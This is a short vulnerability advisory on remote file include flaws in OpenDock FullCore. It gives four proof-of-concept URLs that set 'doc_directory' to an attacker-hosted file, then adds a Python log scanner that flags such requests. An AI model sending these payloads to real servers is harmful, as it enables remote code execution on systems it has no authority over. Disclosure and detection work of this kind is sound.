OpenDock FullCore Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept exploits are available:

http://example.com/[OpenDockFullCore_Path]/sw/index_sw.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_cart/cart.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_cart/lib_cart.php?doc_directory=http://example.com/attacker_file

http://example.com/[OpenDockFullCore_Path]/sw/lib_comment/comment.php?doc_directory=http://example.com/attacker_file
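To check whether requests of this shape have reached a server, the following added example (not part of the original advisory or of OpenDock's code) scans combined-format access log lines for a `doc_directory` value that looks like a URL rather than a local directory. The log lines, the `/opendock/` install path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "doc_directory"  # parameter named in the advisory's proof-of-concept URLs
# Scheme or wrapper prefix (http://, ftp://, php://, data:) or protocol-relative //host.
# Two or more scheme characters are required, so a Windows drive letter (C:) is not flagged.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.IGNORECASE)
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def flag_remote_include(line):
    """Return (path, value) if the line sets doc_directory to a remote-looking value."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        if name.lower() == PARAM and REMOTE_VALUE.match(unquote(value)):
            return target.path, value
    return None

def scan(lines):
    """Return every (path, value) hit found in an iterable of log lines."""
    return [hit for hit in map(flag_remote_include, lines) if hit]

# Constructed sample entries; /opendock/ is an assumed install path.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /opendock/sw/index_sw.php'
    '?doc_directory=http://example.com/attacker_file HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /opendock/sw/lib_cart/cart.php'
    '?doc_directory=http%253A%252F%252Fexample.com%252Fattacker_file HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2010:10:01:00 +0000] "GET /opendock/sw/lib_comment/comment.php'
    '?doc_directory=docs/ HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2010:10:01:02 +0000] "GET /opendock/sw/index_sw.php'
    ' HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for path, value in scan(SAMPLE_LOG):
        print(f"suspicious {PARAM} on {path}: {value}")
```

Values sent in a POST body do not appear in an access log, so they need a check at a proxy, WAF or in the application itself.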


 

Copyright 2010, SecurityFocus